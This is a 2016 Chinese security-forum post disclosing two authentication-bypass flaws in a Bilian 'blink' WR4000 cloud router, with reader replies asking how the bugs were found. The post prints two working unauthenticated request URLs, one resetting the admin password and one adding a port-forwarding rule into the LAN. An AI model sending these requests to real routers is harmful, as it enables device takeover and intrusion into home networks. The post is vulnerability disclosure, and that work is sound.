首页
社区
课程
招聘
[原创]阿里blink路由器漏洞分析
发表于: 2016-6-12 17:38 21289

[原创]阿里blink路由器漏洞分析

2016-6-12 17:38
21289

必联公司的wr4000云路由器是阿里智能家居系列的一款产品,目前已经有超过5万人正在使用。通过本文中的方法分析官网提供的更新固件,我们找到了两个典型的漏洞。
1、认证绕过之管理员密码重置。在动态测试的结果显示我们可以在未登录路由器的情况下直接访问protomimacol.csp文件,通过构造请求链接http://192.168.16.1/protomimacol.csp?fname=system&opt=login_account&function=set&user=admin&password=admin123就可以重置user字段表示的用户的登录密码为password字段值。
2、认证绕过之内外网端口映射。动态测试的结果显示用户可以在未登录路由器的情况下直接访问protocol.csp文件,通过人工构造请求链接http://192.168.16.1/protocol.csp?fname=net&opt=host_nat&function=set&mac=00:05:5D:60:78:3E&act=add&out_port=80&in_port=80&proto=3&enable=1,就可以突破路由器的屏障,实现从互联网进入到局域网内的主动连接。其中mac字段是局域网内部的被映射的主机mac地址,in_port字段是局域网内被映射主机的端口,out_port是路由器开放的相对应的转发端口,proto为3表示此端口映射支持tcp和udp协议。


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 3
支持
分享
最新回复 (17)
雪    币: 100
活跃值: (328)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
分析的过程呢?
2016-6-12 19:29
0
雪    币: 92
活跃值: (154)
能力值: ( LV8,RANK:135 )
在线值:
发帖
回帖
粉丝
3
抓一下所有的数据包,然后重放就得到了
2016-6-13 10:35
0
雪    币: 168
活跃值: (100)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
认真点写呗。
2016-6-13 11:06
0
雪    币: 112
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
写得也算清楚了,主要是web功能没有任何校验啊。
2016-6-13 11:26
0
雪    币: 202
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
6
这个竟然都没有给精?这要是原创,就是公开了一个漏洞好吧,虽然使用面不够广。
2016-7-18 09:01
0
雪    币: 86
活跃值: (1230)
能力值: ( LV7,RANK:150 )
在线值:
发帖
回帖
粉丝
7
好帖
2016-7-31 16:27
0
雪    币: 1149
活跃值: (888)
能力值: ( LV13,RANK:260 )
在线值:
发帖
回帖
粉丝
8
==..... 这种肯定不能给好不好,你得写清楚啊... 两句话就能说明你有漏洞,那也太简单了
2016-7-31 17:02
0
雪    币: 5
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
看帖回帖,虽然我不懂,但是我在学习~
2016-8-1 14:01
0
雪    币: 399
活跃值: (636)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
感觉有意思要详细点就更好了
2016-8-1 15:24
0
雪    币: 92
活跃值: (154)
能力值: ( LV8,RANK:135 )
在线值:
发帖
回帖
粉丝
11
说实话,漏洞的东西有时候就是很简单的,利用起来就是那么回事。。。。不知道怎么写详细
2016-8-7 08:31
0
雪    币: 6790
活跃值: (4441)
能力值: (RANK:600 )
在线值:
发帖
回帖
粉丝
12
可以把你是如何找到这个漏洞的过程写下来,分享你发现的方法等等,外国人喜欢把自己分析过程中遇到问题,如何解决的,甚至是当时的心情都记录下来,既可以给自己的技术经历留下记录,也可以影响更多的人。
2016-8-26 16:00
0
雪    币: 47147
活跃值: (20460)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
13
是的,把成长经历用文字记录下,是一件很快乐的事!
2016-8-26 19:11
0
雪    币: 168
活跃值: (100)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
写好文章也是一种能力。
2016-8-27 04:16
0
雪    币: 92
活跃值: (154)
能力值: ( LV8,RANK:135 )
在线值:
发帖
回帖
粉丝
15
现在已经忘了当时的感觉了,哈哈
2016-8-27 09:36
0
雪    币: 202
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
16
他写的已经非常清楚了,我没有环境,没有实验,但从他说的情况看,明显是对修改口令的过程没有进行认证审核的一个漏洞。他的过程,推测是在记录了修改口令的数据流,然后直接在没有登录的情况下试用,结果也可以修改。我认为他自己回复的对,漏洞这东西,有时候就是很简单的东西(重点在有时候),就是没有分析国产化太多规律来遵循而已,对这个分析有效,对那个分析无效,需要很多耐心和精力。
2016-11-8 21:41
0
雪    币: 92
活跃值: (154)
能力值: ( LV8,RANK:135 )
在线值:
发帖
回帖
粉丝
17
你是高手
2016-11-11 09:10
0
雪    币: 202
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
18
你能发现漏洞,还是硬件组成员,才是真正的高手。
2016-11-16 16:12
0
游客
登录 | 注册 方可回帖
返回
//